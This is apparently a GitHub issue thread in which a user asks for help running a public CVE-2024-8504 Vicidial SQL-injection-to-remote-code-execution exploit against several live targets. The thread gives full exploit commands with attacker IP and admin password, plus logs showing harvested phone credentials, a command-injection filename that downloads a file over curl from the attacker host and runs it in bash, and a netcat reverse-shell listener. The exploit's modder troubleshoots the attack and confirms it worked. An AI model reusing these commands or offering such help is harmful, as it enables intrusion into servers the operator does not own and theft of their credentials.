what is server ip. wh

[mohamadtay]

When I can't understand what you mean by server ip. wh i put same of my ip lh -wh i do not know what is it so i waw by a vps and install php and apache server on it and set ip as -wh -wp i set http port 80

i think proplem it is with -wh -wp i do not know what is it and how i set it true -lh i install nc on my linux vps to recive shell command connection with taget -lp 1594 nc -lvv 1594

`python3.8 exploit.py -u https://mytarget.com -wh 80.94.93.246 -wp 80 -lh 80.94.93.246 -lp 1594 -un admin -pw ba0631cce2d85a37 -b

    =============================================
    |           EXPLOIT CVE-2024-8504           |
    |     Unauthenticated SQLi to RCE Exploit   |
    |            Found by:  KoreLogic           |
    |           Modded by:  Chocapikk           |
    =============================================

    SQLi Command:
    python exploit.py -u https://example.org

    RCE Command (Authenticated):
    python exploit.py -b -u https://example.org \
        -wh <webserver IP> -wp <webserver port> \
        -lh <your IP> -lp <your listener port>  \
        -un <admin username> -pw <admin password>

    =============================================

[] Using provided credentials for exploitation... [+] Authenticated successfully as user "admin" [+] Updated user settings to increase privileges [+] Updated system settings [+] Created dummy campaign "Armstrong-Ramos Logistics" [+] Updated dummy campaign settings [+] Created dummy list for campaign [+] Found phone credentials: 1001:see123 [!] Could not find the required dynamic fields, constructing manually [+] Manually constructed dynamic field names: MGR_login20241012, MGR_pass20241012 [+] Entered "manager" credentials to override shift enforcement [+] Authenticated as agent using phone credentials [-] Error retrieving session_name or session_id: list index out of range [] Deleting campaign 'Armstrong-Ramos Logistics' with ID 969573 [+] Campaign deleted successfully. [root@localhost CVE-2024-8504]# `

`

[Chocapikk]

?????

[Chocapikk]

@mohamadtay I noticed that it's not my code, it's this one

https://github.com/havokzero/ViciDial

Seems like there's a lot of stuff that's nonsense

[mohamadtay]

i am so sorry . i update it

[Chocapikk]

You don't need to install/use PHP or Apache on your VPS. The exploit will automatically create the web server once the payload is delivered to the Vicidial instance. From what I see in your test, you're having an issue when trying to connect as an agent towards the end of the exploitation, which is likely why it's not working. I recommend trying another instance or setting up a local lab since this error is quite common and doesn't have a clear solution.

Your configuration is correct for running the exploit. You can execute it directly from your VPS, where the web server will be set up as part of the process, along with the reverse shell listener. There's no need for additional setup, the exploit handles everything. Just ensure the Vicidial instance you're targeting is exploitable, and it should work as expected.

[mohamadtay]

What I understood from your explanation. The -wh, -wp are the addresses of my device, and it is not required that they contain anything. It is just an IP address with random port ? I've had the same problem on more than one target it is same error . and all targets working good on CVE-2024-8503

[mohamadtay]

why it is take a long time for git response

[*] Using provided credentials for exploitation... [+] Authenticated successfully as user "superuser" [+] Updated user settings to increase privileges [+] Updated system settings [+] Created dummy campaign "Brown-Moore Queue" [+] Updated dummy campaign settings [+] Created dummy list for campaign [+] Found phone credentials: 1001:1001 <Response [200]> [+] Retrieved dynamic field names: MGR_login20241012, MGR_pass20241012 [+] Entered "manager" credentials to override shift enforcement [+] Authenticated as agent using phone credentials $(curl$IFS@80.94.93.246:880$IFS-o$IFS.yu6o&&bash$IFS.yu6o) [+] Session Name: 1728730538_100114608511, Session ID: 8600051 [+] Recording ID: 15434 retrieved successfully [~] MonitorConf command sent for Channel Local/8309@default on 88.99.94.156 Filename: $(curl$IFS@80.94.93.246:880$IFS-o$IFS.yu6o&&bash$IFS.yu6o) RecorDing_ID: 15434 RECORDING WILL LAST UP TO 60 MINUTES

[] Deleting campaign 'Brown-Moore Queue' with ID 173762 [+] Campaign deleted successfully. [] Listening for incoming connections... [] Starting Netcat listener on port 1596 [] Webserver started at 80.94.93.246:880 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Listening on :::1596 Ncat: Listening on 0.0.0.0:1596 ls

[Chocapikk]

Here in your test the exploitation worked, you have to wait at least 2-3 minutes for the remote cronjob to run

[Chocapikk]

What I understood from your explanation. The -wh, -wp are the addresses of my device, and it is not required that they contain anything. It is just an IP address with random port ?

No this is required. This is necessary for your payload on your webserver to be executed on the remote machine. Your command is good.